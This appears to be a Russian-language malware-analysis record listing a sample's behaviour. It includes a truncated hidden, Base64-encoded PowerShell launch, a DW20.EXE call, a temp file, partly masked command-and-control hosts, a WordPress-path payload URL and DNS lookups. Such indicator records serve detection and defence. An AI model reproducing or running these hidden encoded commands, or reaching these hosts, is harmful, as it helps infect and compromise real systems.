Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABDAGsAcABjAHEAYwBiAGgAcgA9ACcARwB0AHcAYwBiAHEAYwBwACcAOwAkAFkAYQB6AGoAZQB0AGYAaQB0AHEAIAA9ACAAJwA5ADMAMAAnADsAJABBAHoAaABlAGMAbgB1AGYAdwBoAD0AJwBNAG0AYgBxAG4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1041946.cvr
- 'hi#####stetica.com.br':80
- 'me###asarim.com':80
- 'ad######.bengalgroup.com':443
- http://me###asarim.com/wp-admin/qvuqz/
- 'ad######.bengalgroup.com':443
- DNS ASK hi#####stetica.com.br
- DNS ASK me###asarim.com
- DNS ASK co#####ianzgilling.com
- DNS ASK ad######.bengalgroup.com
- DNS ASK cl####olutionow.com